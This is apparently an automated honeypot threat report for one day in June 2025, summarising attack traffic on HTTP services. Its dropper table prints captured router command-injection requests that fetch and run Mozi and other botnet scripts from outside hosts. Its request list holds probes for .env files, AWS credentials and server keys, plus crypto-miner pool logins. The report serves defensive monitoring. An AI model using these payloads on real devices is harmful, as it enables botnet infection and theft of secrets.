Daily Report: 2025-06-23#
Executive summary#
interaction report on http service of various Hhoneypot around the world.
- Executive summary
- OT report simplified
- Botnet dropper behaviour
- List of request
- List of country_iso_code
executive_summary#
In today’s repport, we detected 5 stage 1 IP address(es), linked to 4 dropper URL(s).
There are 110 new requests that have never been observed before (these were added to the monitored request database.).
A total of 775 requests were recorded during the day, originating from 5 different countries, with a peak of 225 requests coming from US.
ot_simplified_report#
simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.
source_country | targeted_country |
---|---|
US | Dubai |
botnet_dropper_behaviour#
remote_addr | request |
---|---|
45.135.194.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28killall%20-9%20mipsel%20mpsl%3B%28wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%7C%7Cbusybox%20wget%20-O-%20http%3A%2F%2F14.103.145.202%2Frondo.sh%29%20%7C%20sh%20-s%20tplink%3B%29 HTTP/1.1 |
103.93.93.162 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
117.209.26.140 | 27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0 |
139.5.11.123 | GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139.5.11.123:34619/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0 |
87.121.84.34 | GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget+http://220.158.232.99/x/tplink+-O- |
request#
The list of requests presented here are those that have not yet been yet integrated into the request database.
number_of_occurence | request | |
---|---|---|
66 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2248JsrSuzreCQUXw5qe1ajS8HotHoCrHVvX7c5tZLiBAc3JzYGSJkJQ8NxqRNkDurMrMAaM34NUBvLdNiF1TY9BVNSU7Gg75\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
84 | 1 | GET /.env.old HTTP/1.1 |
85 | 1 | GET /.env.www HTTP/1.1 |
90 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x33fa4f2917facff27ad2a4b29b1b9a5abcbbefd8\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
100 | 1 | GET /config/settings.ini HTTP/1.1 |
101 | 1 | GET /info HTTP/1.1 |
102 | 1 | GET /env.test.js HTTP/1.1 |
103 | 1 | GET /info.php HTTP/1.1 |
104 | 1 | GET /portal/.env HTTP/1.1 |
105 | 1 | GET /env/.env HTTP/1.1 |
106 | 1 | GET /dev/.env HTTP/1.1 |
107 | 1 | GET /admin/.env HTTP/1.1 |
108 | 1 | GET /application/.env HTTP/1.1 |
109 | 1 | GET /env.bak HTTP/1.1 |
110 | 1 | GET /phpinfo HTTP/1.1 |
111 | 1 | GET /_profiler/phpinfo HTTP/1.1 |
112 | 1 | GET /phpinfo.php HTTP/1.1 |
113 | 1 | GET /.env.bak HTTP/1.1 |
114 | 1 | GET /.env.backup HTTP/1.1 |
115 | 1 | GET /.env_sample HTTP/1.1 |
116 | 1 | GET /aws-secret.yaml HTTP/1.1 |
117 | 1 | GET /awstats/.env HTTP/1.1 |
118 | 1 | GET /conf/.env HTTP/1.1 |
119 | 1 | GET /cron/.env HTTP/1.1 |
120 | 1 | GET /www/.env HTTP/1.1 |
121 | 1 | GET /docker/.env HTTP/1.1 |
122 | 1 | GET /docker/app/.env HTTP/1.1 |
123 | 1 | GET /.env.production HTTP/1.1 |
124 | 1 | GET /.env.production.local HTTP/1.1 |
125 | 1 | GET /.env.prod HTTP/1.1 |
126 | 1 | GET /.env.test HTTP/1.1 |
127 | 1 | GET /.env.sample.php HTTP/1.1 |
128 | 1 | GET /.env.php HTTP/1.1 |
129 | 1 | GET /.env1 HTTP/1.1 |
130 | 1 | GET /.venv HTTP/1.1 |
131 | 1 | GET /env.prod.js HTTP/1.1 |
132 | 1 | GET /mailer/.env HTTP/1.1 |
133 | 1 | GET /nginx/.env HTTP/1.1 |
134 | 1 | GET /public/.env HTTP/1.1 |
135 | 1 | GET /site/.env HTTP/1.1 |
136 | 1 | GET /xampp/.env HTTP/1.1 |
137 | 1 | GET /.docker/laravel/app/.env HTTP/1.1 |
138 | 1 | GET /laravel/.env.local HTTP/1.1 |
139 | 1 | GET /new/.env HTTP/1.1 |
140 | 1 | GET /new/.env.local HTTP/1.1 |
141 | 1 | GET /new/.env.production HTTP/1.1 |
142 | 1 | GET /new/.env.staging HTTP/1.1 |
143 | 1 | GET /_phpinfo.php HTTP/1.1 |
144 | 1 | GET /_profiler/phpinfo/info.php HTTP/1.1 |
145 | 1 | GET /_profiler/phpinfo/phpinfo.php HTTP/1.1 |
146 | 1 | GET /wp-config HTTP/1.1 |
147 | 1 | GET /env.php HTTP/1.1 |
148 | 1 | GET /bootstrap/cache/config.php HTTP/1.1 |
149 | 1 | GET /storage/app/private/.env HTTP/1.1 |
150 | 1 | GET /storage/logs/laravel.log HTTP/1.1 |
151 | 1 | GET /composer.lock HTTP/1.1 |
152 | 1 | GET /server.key HTTP/1.1 |
153 | 1 | GET /dump.sh HTTP/1.1 |
154 | 1 | GET /php5.ini HTTP/1.1 |
155 | 1 | GET /env.backup HTTP/1.1 |
156 | 1 | GET /xampp/phpinfo.php HTTP/1.1 |
157 | 1 | GET /lara/info.php HTTP/1.1 |
158 | 1 | GET /lara/phpinfo.php HTTP/1.1 |
159 | 1 | GET /laravel/info.php HTTP/1.1 |
160 | 1 | GET /.vscode/.env HTTP/1.1 |
161 | 1 | GET /js/.env HTTP/1.1 |
162 | 1 | GET /laravel/core/.env HTTP/1.1 |
163 | 1 | GET /mail/.env HTTP/1.1 |
164 | 1 | GET /docker.sh HTTP/1.1 |
166 | 1 | GET /m2Pm HTTP/1.1 |
167 | 1 | GET /8nGp HTTP/1.1 |
171 | 1 | GET /laravel/.env.production HTTP/1.1 |
172 | 1 | GET /laravel/.env.staging HTTP/1.1 |
173 | 1 | GET /laravel/core/.env.local HTTP/1.1 |
174 | 1 | GET /laravel/core/.env.production HTTP/1.1 |
175 | 1 | GET /laravel/core/.env.staging HTTP/1.1 |
176 | 1 | GET /main/.env HTTP/1.1 |
177 | 1 | GET /.aws/credentials HTTP/1.1 |
178 | 1 | GET /config.php HTTP/1.1 |
179 | 1 | GET /sendgrid.json HTTP/1.1 |
180 | 1 | GET / HTTP/1.1 |
181 | 1 | GET /.env HTTP/1.1 |
182 | 1 | GET /.env_example HTTP/1.1 |
183 | 1 | GET /core/.env HTTP/1.1 |
184 | 1 | GET /app/.env HTTP/1.1 |
185 | 1 | GET /api HTTP/1.1 |
186 | 1 | GET /backend HTTP/1.1 |
187 | 1 | GET /env HTTP/1.1 |
188 | 1 | GET /laravel/.env HTTP/1.1 |
193 | 1 | GET /config.php.bak HTTP/1.1 |
194 | 1 | GET /src/app.js HTTP/1.1 |
195 | 1 | GET /server-info HTTP/1.1 |
205 | 1 | GET /.docker/.env HTTP/1.1 |
206 | 1 | GET /.env.dev HTTP/1.1 |
207 | 1 | GET /.env.example HTTP/1.1 |
208 | 1 | GET /config.env HTTP/1.1 |
209 | 1 | GET /.environment HTTP/1.1 |
244 | 1 | {\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22method\x22:\x22login\x22,\x22params\x22:{\x22login\x22:\x2246KuG72PYf92S8EjkPASVkdM3d3Ue4Jwv25sRR4uFs7tFVid9aeGczJVtTtrnp9qu3fZceryhrNrtcyGFNMgR3JSLLXSV6y\x22,\x22pass\x22:\x22x\x22,\x22agent\x22:\x22XMRig/6.15.3 (Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\x22,\x22algo\x22:[\x22cn/1\x22,\x22cn/2\x22,\x22cn/r\x22,\x22cn/fast\x22,\x22cn/half\x22,\x22cn/xao\x22,\x22cn/rto\x22,\x22cn/rwz\x22,\x22cn/zls\x22,\x22cn/double\x22,\x22cn/ccx\x22,\x22cn-lite/1\x22,\x22cn-heavy/0\x22,\x22cn-heavy/tube\x22,\x22cn-heavy/xhv\x22,\x22cn-pico\x22,\x22cn-pico/tlo\x22,\x22cn/upx2\x22,\x22rx/0\x22,\x22rx/wow\x22,\x22rx/arq\x22,\x22rx/graft\x22,\x22rx/sfx\x22,\x22rx/keva\x22,\x22argon2/chukwa\x22,\x22argon2/chukwav2\x22,\x22argon2/ninja\x22,\x22astrobwt\x22]}} |
246 | 1 | \x00\x0E\x08U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00 |
247 | 1 | \x00\x0E8U\xDEE\xB2\xCA\x1F\x07’\x00\x00\x00\x00\x00 |
250 | 1 | \x00\x0E\x08\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00 |
251 | 1 | \x00\x0E8\x7F\x98\x0C\xC9\xB7aRi\x00\x00\x00\x00\x00 |
254 | 1 | GET /web/.env HTTP/1.1 |
255 | 1 | GET /crm/.env HTTP/1.1 |
256 | 1 | GET /backend/.env HTTP/1.1 |
257 | 1 | GET /local/.env HTTP/1.1 |
258 | 1 | GET /api/.env HTTP/1.1 |
261 | 1 | \x00\x0E\x085C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00 |
262 | 1 | \x00\x0E85C\xFC\xE9}\xCA’$\x00\x00\x00\x00\x00 |
275 | 1 | {\x22id\x22:1,\x22method\x22:\x22eth_submitLogin\x22,\x22worker\x22:\x22igwrcvap\x22,\x22params\x22:[\x220x20ea1696e333d549e24a3c71964e59fe08bc7df0\x22,\x22x\x22],\x22jsonrpc\x22:\x222.0\x22} |
country_iso_code#
number_of_occurence | country_iso_code | |
---|---|---|
0 | 225 | US |
1 | 168 | GB |
2 | 57 | NL |
3 | 45 | BG |
4 | 38 | DE |
5 | 32 | JP |
6 | 31 | ES |
7 | 27 | CN |
8 | 16 | SG |
9 | 14 | LT |
10 | 13 | CA |
11 | 10 | GH |
12 | 8 | CH |
13 | 8 | PL |
14 | 7 | BR |
15 | 6 | MD |
16 | 6 | HU |
17 | 6 | PT |
18 | 5 | UA |
19 | 5 | KR |
20 | 4 | TR |
21 | 4 | IR |
22 | 3 | NG |
23 | 3 | HK |
24 | 3 | IE |
25 | 3 | BE |
26 | 3 | KZ |
27 | 3 | FR |
28 | 3 | RU |
29 | 2 | IN |
30 | 2 | MC |
31 | 2 | MO |
32 | 2 | VN |
33 | 2 | SC |
34 | 2 | IL |
35 | 2 | ID |
36 | 1 | HN |
37 | 1 | CZ |
38 | 1 | ZA |
39 | 1 | CO |
40 | 1 | RO |